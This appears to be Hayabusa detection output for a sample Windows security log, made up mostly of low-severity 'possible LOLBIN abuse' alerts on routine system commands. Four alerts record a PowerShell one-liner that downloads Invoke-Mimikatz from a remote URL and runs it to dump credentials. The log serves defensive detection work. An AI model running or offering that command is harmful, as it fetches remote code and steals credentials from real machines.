2016-08-28 00:20:57.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x428 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:20:57.955 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:21:00.750 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:21:00.752 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x734 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:21:00.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:22:11.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:22:11.319 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xeac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:31:15.759 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:31:37.371 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:31:37.402 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:08.574 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb20 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:32:35.199 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz –DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x500 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 00:34:22.339 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 01:46:13.438 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb74 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 01:46:13.445 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x648 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:54.269 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xcf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:55.299 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:44:55.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 06:45:05.616 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x6e0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 11:00:00.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 13:15:14.072 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-28 13:15:14.084 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.766 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART | Path: C:\Windows\System32\rundll32.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.851 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x778 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:30.855 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xb18 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:31.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:31.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:37:31.960 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xebc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.785 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-29 23:54:31.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:12:55.760 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.352 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\pokby4eb.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\zfglcxyz.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\agq-0l0x.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xdec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:56.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\h5llmxxc.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xb80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:57.533 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xb18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:19:57.542 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x1a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:26:10.013 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 00:26:10.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xaa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:52:07.690 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x704 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:52:09.246 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:06.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:10.198 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 03:55:10.265 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x458 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 04:01:46.591 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb08 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 05:07:27.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x41c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 05:07:27.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x748 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:32:15.294 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:32:37.708 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:33:45.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x770 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:33:47.755 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:36:08.808 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1454 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 06:36:32.722 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbdc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-30 10:44:32.448 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x17ac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
